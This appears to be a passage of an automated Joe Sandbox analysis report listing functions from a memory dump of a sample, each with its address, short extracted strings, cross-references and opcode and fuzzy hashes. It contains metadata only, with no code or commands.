Function 00007FF848F1ED50 Relevance: 4.1, Strings: 3, Instructions: 319COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F1EE2B
x6CH, xrefs: 00007FF848F1F056
x6CH, xrefs: 00007FF848F1EE86

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: x6CH$x6CH$x6CH
API String ID: 0-1168066917
Opcode ID: 3bbc4e9ca513f3e82bcae389b0ba6a6fff2198378ae93958577a2cd3f6c3d40c
Instruction ID: bc1c3ce3327ed601f83680b162a070b3ea1e6246bd61ef12656dcdde3d6b4beb
Opcode Fuzzy Hash: 3bbc4e9ca513f3e82bcae389b0ba6a6fff2198378ae93958577a2cd3f6c3d40c
Instruction Fuzzy Hash: A3A1BF30A1CA4A8FE795EB28C411679B7E1EF8A394F1144B9D84DC72D2CF39AC42C758

Function 00007FF848F3A511 Relevance: 3.9, Strings: 3, Instructions: 116COMMON

Download Yara Rule

Strings

#DH, xrefs: 00007FF848F3A5AB
#DH, xrefs: 00007FF848F3A5EB
x6CH, xrefs: 00007FF848F3A60B

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: #DH$ #DH$x6CH
API String ID: 0-3020653095
Opcode ID: 22e10150cd02ca0824938bbbfeab5409229bcd18557182372b5f06832fe017cc
Instruction ID: 620f2a36d0300982ced8b47fb561bd76d5ebd2dd4127c7f11e16004e02ab9384
Opcode Fuzzy Hash: 22e10150cd02ca0824938bbbfeab5409229bcd18557182372b5f06832fe017cc
Instruction Fuzzy Hash: 69310330A1CB564FD79AEB2C8410221B7E1FF4A744F1905BAC449CB296DB39EC818785

Function 00007FF848F52920 Relevance: 3.3, Strings: 2, Instructions: 764COMMON

Download Yara Rule

Strings

x1I, xrefs: 00007FF848F5B193
p%DH, xrefs: 00007FF848F5B73D

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: p%DH$x1I
API String ID: 0-2513612367
Opcode ID: fa87a759efddcb154bab3c8295fbd2db3ee32bfb07e580f9424ec91197ea24be
Instruction ID: 64f84cbe1502b97e15dbafe0d54af67a954395b6653bb9d8687817520b89c886
Opcode Fuzzy Hash: fa87a759efddcb154bab3c8295fbd2db3ee32bfb07e580f9424ec91197ea24be
Instruction Fuzzy Hash: 1A32D130A1CA498FEB98EB2C84556B9B7E1EF99394F0401BAD44DD72D7CF28AC41C785

Function 00007FF848F2F87F Relevance: 3.2, Strings: 2, Instructions: 672COMMON

Download Yara Rule

Strings

0_CH, xrefs: 00007FF848F2FB74
_CH, xrefs: 00007FF848F2FB8E

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: _CH$0_CH
API String ID: 0-2127518990
Opcode ID: 7b5a5fdea98e9dfd77ae13578cba95f13d44cdabf1dfb570ba1417169c409cc9
Instruction ID: e6ee9753d6b9e41372b429c139c3c51285ae41adc8a821570dc8e9c187721e2d
Opcode Fuzzy Hash: 7b5a5fdea98e9dfd77ae13578cba95f13d44cdabf1dfb570ba1417169c409cc9
Instruction Fuzzy Hash: F7122930B0CA494FD785FB2898156F97BE2EF8B364B0541FAD449CB1D3DE2AAC428745

Function 00007FF848F200C1 Relevance: 3.0, Strings: 2, Instructions: 453COMMON

Download Yara Rule

Strings

x[CH, xrefs: 00007FF848F2041B
p[CH, xrefs: 00007FF848F203F7

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: p[CH$x[CH
API String ID: 0-3514747532
Opcode ID: d0959e2494666c351888569862bb3dab8e1863d2fa03565593dda2a9e34038f8
Instruction ID: 1060b4c3a2f1d975bbad283219a01cd7e7954bc17d33b96795d3e7365e295a49
Opcode Fuzzy Hash: d0959e2494666c351888569862bb3dab8e1863d2fa03565593dda2a9e34038f8
Instruction Fuzzy Hash: 36E1283290DA894FE786B73898151A57FE0EF86390F1501FAD84CCB1E3DE2E6D168355

Function 00007FF848F22828 Relevance: 2.9, Strings: 2, Instructions: 449COMMON

Download Yara Rule

Strings

(_CH, xrefs: 00007FF848F2293A
0_CH, xrefs: 00007FF848F22954

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: (_CH$0_CH
API String ID: 0-3306684182
Opcode ID: cfad564dd28c70db90e761abf939c0eb060e0f9abd7103c00743a52755f2beb9
Instruction ID: 3739f3a85464ff993230ee447ccd0e5601238f6c64cf7d1dd03e5c39bd309312
Opcode Fuzzy Hash: cfad564dd28c70db90e761abf939c0eb060e0f9abd7103c00743a52755f2beb9
Instruction Fuzzy Hash: 45D1C630A1CA494FE385FB68D4556A5B7E2FF8A394F1444BAD049C72E7CE3AAC428705

Function 00007FF848F18866 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

&}`, xrefs: 00007FF848F18B7C
&}`, xrefs: 00007FF848F188D8

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: &}`$&}`
API String ID: 0-3442511786
Opcode ID: c98ac829f0126e5af4b32efff94a663a6ab667905b0d6548664e2fdde89afc76
Instruction ID: 1018f55fb78321eb681c926cd98642642271691ebf5c55ceeaebc01ce7823845
Opcode Fuzzy Hash: c98ac829f0126e5af4b32efff94a663a6ab667905b0d6548664e2fdde89afc76
Instruction Fuzzy Hash: BBB1B430A1DA4D4FEB68EF28C8557E93BE1FF55350F44426AE84DC7292CF34A8458B86

Function 00007FF848F35D68 Relevance: 2.8, Strings: 2, Instructions: 287COMMON

Download Yara Rule

Strings

xJH, xrefs: 00007FF848F35E44
pJH, xrefs: 00007FF848F35DE4

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: pJH$xJH
API String ID: 0-3978246771
Opcode ID: df0ec5607ae68fdc2fe69c5d51d4408cff94f360f8bdcd351dc08a6082260d82
Instruction ID: 864529bffdff5eaf0d9efc2fd3e021d8b0e5352a081d7602c262d2779d50c677
Opcode Fuzzy Hash: df0ec5607ae68fdc2fe69c5d51d4408cff94f360f8bdcd351dc08a6082260d82
Instruction Fuzzy Hash: 9E91C230B1AA098FE744FB6CD4557A9B7E2FF99384F6441BAE00CD72D2DE28AC418715

Function 00007FF848F204E1 Relevance: 2.8, Strings: 2, Instructions: 265COMMON

Download Yara Rule

Strings

ZCH, xrefs: 00007FF848F205A3
p[CH, xrefs: 00007FF848F20596

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: p[CH$ZCH
API String ID: 0-2854337378
Opcode ID: 9bfe5c58c0a4807c2a881d18cd389afe277b4bbdeb5648ee101255bde04cf473
Instruction ID: ba5286cef24cdd33ae66b477ec94e573c98b6a3befcb708a5905ea2600a7dd8d
Opcode Fuzzy Hash: 9bfe5c58c0a4807c2a881d18cd389afe277b4bbdeb5648ee101255bde04cf473
Instruction Fuzzy Hash: 24919F31A08A4E8FDB88EF18C8546BA77F2FF99350F544569D81AD73D5CB35A842CB80

Function 00007FF848F22C38 Relevance: 2.7, Strings: 2, Instructions: 244COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F22CA7
0_CH, xrefs: 00007FF848F22CB4

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: 0_CH$x6CH
API String ID: 0-3416891138
Opcode ID: e9899cd8d5d1b211dfb6ae9286228cc1c881b1a98744812a5862b4c70c49447b
Instruction ID: f28f8721aee33da4621d223e3382986cdae410672b49f9e89dc05d0f18f385e7
Opcode Fuzzy Hash: e9899cd8d5d1b211dfb6ae9286228cc1c881b1a98744812a5862b4c70c49447b
Instruction Fuzzy Hash: B1714630A0CE894FE799EB289451675BBE1FF4A350F1105AAD04DC72E7CF39AC468785

Function 00007FF848F104AD Relevance: 2.7, Strings: 2, Instructions: 213COMMON

Download Yara Rule

Strings

`CH, xrefs: 00007FF848F367D1
`CH, xrefs: 00007FF848F367DE

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: `CH$`CH
API String ID: 0-2459162651
Opcode ID: 2a89197456133b27b062e5a812f568afdcee2f97cba9ff85e1aef2e0ca805319
Instruction ID: 5d48e464232c663e9ca3c5545452871c89755fbb762f8205d8bd92e5ac4eab9d
Opcode Fuzzy Hash: 2a89197456133b27b062e5a812f568afdcee2f97cba9ff85e1aef2e0ca805319
Instruction Fuzzy Hash: F361B030A08A5E8FDB85EB2CD4516EDBBF0FF99380F1401BAD409D71D2DB28A845C790

Function 00007FF848F42E0C Relevance: 2.7, Strings: 2, Instructions: 208COMMON

Download Yara Rule

Strings

8#DH, xrefs: 00007FF848F42E4F
0#DH, xrefs: 00007FF848F42E2D

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: 0#DH$8#DH
API String ID: 0-994675250
Opcode ID: 748b1a1de1b56ae6252203ff2a3e01be814539361dc14a3ce16b27b20524f719
Instruction ID: c3d5f719a6fe3429850f91f41c27f02bb63da7bef0c67c9fb762b16ca508009f
Opcode Fuzzy Hash: 748b1a1de1b56ae6252203ff2a3e01be814539361dc14a3ce16b27b20524f719
Instruction Fuzzy Hash: DA616C3190C68E8FDB45EF68C8406E9B7A1FF95394F1402BAD059DB2C6DB39A843C791

Function 00007FF848F20DE9 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F20EB3
x6CH, xrefs: 00007FF848F20E43

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: x6CH$x6CH
API String ID: 0-1632077197
Opcode ID: ecb4545d3c079ad19ec9f11e6b7916b2afe64aed1fb988495fef7fb51ddafaff
Instruction ID: ffe55192545b2dc887414e0ac20222cc9899072b88a45b4ef991427d72de2cf3
Opcode Fuzzy Hash: ecb4545d3c079ad19ec9f11e6b7916b2afe64aed1fb988495fef7fb51ddafaff
Instruction Fuzzy Hash: 2651933154DBD94FD786EB2889106A47FB0FF4B354B0504EBD448CB1E3C62A9D45C766

Function 00007FF848F20549 Relevance: 2.6, Strings: 2, Instructions: 106COMMON

Download Yara Rule

Strings

ZCH, xrefs: 00007FF848F205A3
p[CH, xrefs: 00007FF848F20596

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: p[CH$ZCH
API String ID: 0-2854337378
Opcode ID: 55c991fa93ee1d431f9a1a4c739cea45065b2f2c260341aa88d5cdcedc0c6ba8
Instruction ID: 55e01553be3205e3dea46c76bb2f2c43254226c100f4b265ba0fa8d8e5cf1def
Opcode Fuzzy Hash: 55c991fa93ee1d431f9a1a4c739cea45065b2f2c260341aa88d5cdcedc0c6ba8
Instruction Fuzzy Hash: 3A315A30A0994E8FDB88EF2CC4546BA73E2FF99340F104169D409C7296CE39AD41CB94

Function 00007FF848F1A33D Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

hLH, xrefs: 00007FF848F1A35F
@\CH, xrefs: 00007FF848F1A373

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: @\CH$hLH
API String ID: 0-681901243
Opcode ID: 375e5ed708b19c2c36513602ebaf9e255ec9d9130134187948d197dbfaa45845
Instruction ID: 299193d5cad430d2eccecc797744c4e8dde566e086c79a3a26c613a53777c120
Opcode Fuzzy Hash: 375e5ed708b19c2c36513602ebaf9e255ec9d9130134187948d197dbfaa45845
Instruction Fuzzy Hash: 5511D372F0C99A4FE396F72C45253642692EF9A390F4801FAC008CB2C7EE199C418355

Function 00007FF848F125C6 Relevance: 2.6, Strings: 2, Instructions: 67COMMON

Download Yara Rule

Strings

H\CH, xrefs: 00007FF848F1264A
@\CH, xrefs: 00007FF848F12633

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: @\CH$H\CH
API String ID: 0-15658339
Opcode ID: 337feedc5c1c76a714278837c20a1dee674dfad47e23c47d1d957599234169b7
Instruction ID: d1d8352dddf9a2c548256bb3ea1f1d6188af02aec6dfa6b608d0a340deb4a357
Opcode Fuzzy Hash: 337feedc5c1c76a714278837c20a1dee674dfad47e23c47d1d957599234169b7
Instruction Fuzzy Hash: B311BE32A1EBC98FE34AA7B848242693BB1FF86394F1504FAD049CB1D7DE299D058355

Function 00007FF848F12592 Relevance: 2.6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

H\CH, xrefs: 00007FF848F1264A
@\CH, xrefs: 00007FF848F12633

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: @\CH$H\CH
API String ID: 0-15658339
Opcode ID: f8e1a2181fc6a173da1f3e4787017dae8b74944de1ffafa327bcd31f2507713b
Instruction ID: f323e5a7512235a4e8618432687acb5b9f3214a4605a15b01166efaaa8aeb355
Opcode Fuzzy Hash: f8e1a2181fc6a173da1f3e4787017dae8b74944de1ffafa327bcd31f2507713b
Instruction Fuzzy Hash: F8119D31A1EBCA4FE74AA7B854242A92BB1EF86384F1504FAD049CB1D7CE299D05C355

Function 00007FF848F1A350 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

hLH, xrefs: 00007FF848F1A35F
@\CH, xrefs: 00007FF848F1A373

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: @\CH$hLH
API String ID: 0-681901243
Opcode ID: f0c595571c938894b3f07c5606b2f27b32e2d2fe03a7bcda4390706b75f96299
Instruction ID: 3a70e5296b4991b42c81544a4a016341a3662b1455fd3ce9e2ac5de3242fe6ea
Opcode Fuzzy Hash: f0c595571c938894b3f07c5606b2f27b32e2d2fe03a7bcda4390706b75f96299
Instruction Fuzzy Hash: 7411CE32F0CD6A5FE29AB72C44113652692EFDA790F5802BAC40CCB2C7EE195C418395

Function 00007FF848F125A6 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

H\CH, xrefs: 00007FF848F1264A
@\CH, xrefs: 00007FF848F12633

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: @\CH$H\CH
API String ID: 0-15658339
Opcode ID: 65ece3adb3ccc9279db907598d2926a80e8715d5158f061c9c48b97416b043b7
Instruction ID: 061806157ebfc8da1ff154ef313c1dc6d4842f1d8b059c95365c46dd1c08c5ae
Opcode Fuzzy Hash: 65ece3adb3ccc9279db907598d2926a80e8715d5158f061c9c48b97416b043b7
Instruction Fuzzy Hash: 69010471E0DA998FE749B77858142A93AB1FF96384F1004B9D009C72C3DE395D00C755

Function 00007FF848F33EB5 Relevance: 1.8, Strings: 1, Instructions: 574COMMON

Download Yara Rule

Strings

]CH, xrefs: 00007FF848F33FD1

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: ]CH
API String ID: 0-3966265841
Opcode ID: 260418cdd210b239baf0b101f525196f63dfbb106ddacf0d6f5fd1f8738485f9
Instruction ID: d8649639bfffbe2920a366266fd6316f3777b89f314d6a2180402a1ba989f286
Opcode Fuzzy Hash: 260418cdd210b239baf0b101f525196f63dfbb106ddacf0d6f5fd1f8738485f9
Instruction Fuzzy Hash: 4202F530A0CA498FE749FB28D8456B577E1EF9A354F1400BBD449C71E3DE2AAC42C755

Function 00007FF848F1250A Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

hN_H, xrefs: 00007FF848F1BC73

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: hN_H
API String ID: 0-3774228483
Opcode ID: 643be3b87bf4c8743ebba138c3f14bed9f9edd47b67fd21568d6520537045dce
Instruction ID: 9d2a0f6340ef4a1cdeb72aa8c9cd624c978def4cc0cd3ef16e17c8237af066eb
Opcode Fuzzy Hash: 643be3b87bf4c8743ebba138c3f14bed9f9edd47b67fd21568d6520537045dce
Instruction Fuzzy Hash: 6502D730A1DA49CFE786EB38C8515A9BBB1EF4B344F1505F9D048CB5A3CA3AAC41CB50

Function 00007FF848F270A1 Relevance: 1.8, Strings: 1, Instructions: 507COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F274C8

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: x6CH
API String ID: 0-209328937
Opcode ID: 1414ae58018b56c0251f3d8843227687153c2e8a464a30b1051a0c68e6c16d6f
Instruction ID: 53a42520df87126404589fe501026d9c737fafc335106aa9c94b505ec9444fbf
Opcode Fuzzy Hash: 1414ae58018b56c0251f3d8843227687153c2e8a464a30b1051a0c68e6c16d6f
Instruction Fuzzy Hash: 25E17830A0DE4A4FE789FB2898556B57BE1EF8A3A0F0441BAD44DC71D3DF29AC428751

Function 00007FF848F39DA9 Relevance: 1.7, Strings: 1, Instructions: 471COMMON

Download Yara Rule

Strings

k+, xrefs: 00007FF848F39E6F, 00007FF848F39E8A, 00007FF848F39F18, 00007FF848F39FFC, 00007FF848F3A051

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: k+
API String ID: 0-3464814512
Opcode ID: 220046e82dc8a4a0530c5c9145996422a3c3e05a01a8bd15c8f45fb24dcddb4d
Instruction ID: 74231614f04f10d63483b7f533ca510b2d5225fa24cf374a3c670eef7d8a8b0d
Opcode Fuzzy Hash: 220046e82dc8a4a0530c5c9145996422a3c3e05a01a8bd15c8f45fb24dcddb4d
Instruction Fuzzy Hash: BDE10030B1CE4A4FE39AAB2984553B9B7D1FF55790F14017EC44EC36D2DF28A8828B85

Function 00007FF848F1BB67 Relevance: 1.6, Strings: 1, Instructions: 343COMMON

Download Yara Rule

Strings

hN_H, xrefs: 00007FF848F1BC73

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: hN_H
API String ID: 0-3774228483
Opcode ID: 855f46f2e7cbda4135327d8971ecaede038b914c34198da810bcb35af9b28203
Instruction ID: 030315440c1ae6dd2c15c36f62863df3f071f4fb53196d26353836bd1fbc2598
Opcode Fuzzy Hash: 855f46f2e7cbda4135327d8971ecaede038b914c34198da810bcb35af9b28203
Instruction Fuzzy Hash: FAC16430A19A59CFD78ADF78C541559BBB1FF4F344B2544E9C009DB6A7CA36AC81CB10

Function 00007FF848F3009D Relevance: 1.6, Strings: 1, Instructions: 320COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F300D4

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: x6CH
API String ID: 0-209328937
Opcode ID: 1f28318b703b70d0c09e4404678c16ee2278b5661cef41543241a47d3bdab891
Instruction ID: ab363739702c8f174c1859629fdf6642a25302b36454aebbe0fdc634b9b11dad
Opcode Fuzzy Hash: 1f28318b703b70d0c09e4404678c16ee2278b5661cef41543241a47d3bdab891
Instruction Fuzzy Hash: 54910231A1C94D8FE785FB689805AE9B7E1FF99360F0442BBD40DC72D2DE29A8418385

Function 00007FF848F258C1 Relevance: 1.6, Strings: 1, Instructions: 309COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F2593C

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: x6CH
API String ID: 0-209328937
Opcode ID: c6267d3b4d9b2f5ad309a569ca89b09042e7be6bff980251b368e19563f7e1ec
Instruction ID: 36c70e5114990fb962fa7440dd8f0925c1ce114a6b023f64a78ac2bbbf86f941
Opcode Fuzzy Hash: c6267d3b4d9b2f5ad309a569ca89b09042e7be6bff980251b368e19563f7e1ec
Instruction Fuzzy Hash: CF91F430A1DA4E8FDB84EB6CD4846A9B7E1FF99354F1042BAC40DC7296DE39AC46C744

Function 00007FF848F30E2D Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

hLH, xrefs: 00007FF848F30E36

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: hLH
API String ID: 0-2702469320
Opcode ID: 38fcd7cb26f47d240dc1e5f9897201d2d35603331caa09c4674c9aef91128ce4
Instruction ID: 289fb95a645891005746499b517ba77e332bf8702b2a72a6fc93555c03fa956c
Opcode Fuzzy Hash: 38fcd7cb26f47d240dc1e5f9897201d2d35603331caa09c4674c9aef91128ce4
Instruction Fuzzy Hash: C5A17030A0C90E8FEB99FB68C4546A9B7E1FF99350F1441BAD40DD7296DF39A8828744

Function 00007FF848F23E95 Relevance: 1.5, Strings: 1, Instructions: 273COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F23F90

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: x6CH
API String ID: 0-209328937
Opcode ID: e49f1ee2188c4a7a9e964f827f105407648095c05a5d55fbcf89632f95e77e20
Instruction ID: 1abac685c5c0abe8615649d788b364d7e0859235bfc1d1e43d5f268354ce6f8e
Opcode Fuzzy Hash: e49f1ee2188c4a7a9e964f827f105407648095c05a5d55fbcf89632f95e77e20
Instruction Fuzzy Hash: C881D63061DA4A5FE789FB2C98146B57BE1EF9A350F0400FAD44DC72E3DE29AC458396

Function 00007FF848F1E51C Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F1E5C9

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: x6CH
API String ID: 0-209328937
Opcode ID: c682dab76c2b6c81f3ff949da07bdba0b3f097ed39cbbdd9c196c5f939ca4196
Instruction ID: 1eaa42cb30a985454c8c37c83a4125d0e7d7b148ee51f786a15c5bb65546c2e6
Opcode Fuzzy Hash: c682dab76c2b6c81f3ff949da07bdba0b3f097ed39cbbdd9c196c5f939ca4196
Instruction Fuzzy Hash: 2A819331E0CA0A8FEB85EB68C4556A977E1EF5A384F2044B9C40DCB2D6DF39AC42C755

Function 00007FF848F21C48 Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F23F90

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: x6CH
API String ID: 0-209328937
Opcode ID: 0626698bd8ac2d9a6a63ef5878b9c115c70d418bc88154a6cdbe3ba9977fe6fd
Instruction ID: 21ae5a9bb7077d8600a66121108337b00b83935f24e22abc93f84c2a43fcdfe0
Opcode Fuzzy Hash: 0626698bd8ac2d9a6a63ef5878b9c115c70d418bc88154a6cdbe3ba9977fe6fd
Instruction Fuzzy Hash: 6661B230B1CD5A5FEB89FB2C98556B977E2EF99390F0400B9E40DC72D2DE29AC418785

Function 00007FF848F2D62E Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

x6CH, xrefs: 00007FF848F2D656

Memory Dump Source

Source File: 00000000.00000002.2318197134.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f10000_uyz4YPUyc9.jbxd

Similarity

API ID:
String ID: x6CH
API String ID: 0-209328937
Opcode ID: 842d761b5f268fc7e4fc2a5582704c26e7731e9c5506772023679a18beadb319
Instruction ID: 996662430e5de6b59240a1919982665958b907545ca5a223d2797808f47dcd10
Opcode Fuzzy Hash: 842d761b5f268fc7e4fc2a5582704c26e7731e9c5506772023679a18beadb319
Instruction Fuzzy Hash: 12615930E1890D8FEB88EB6CD4556BC77E2EF88794F144179E44ED32D6DE29AC428B44

Function 00007FF848F39625 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

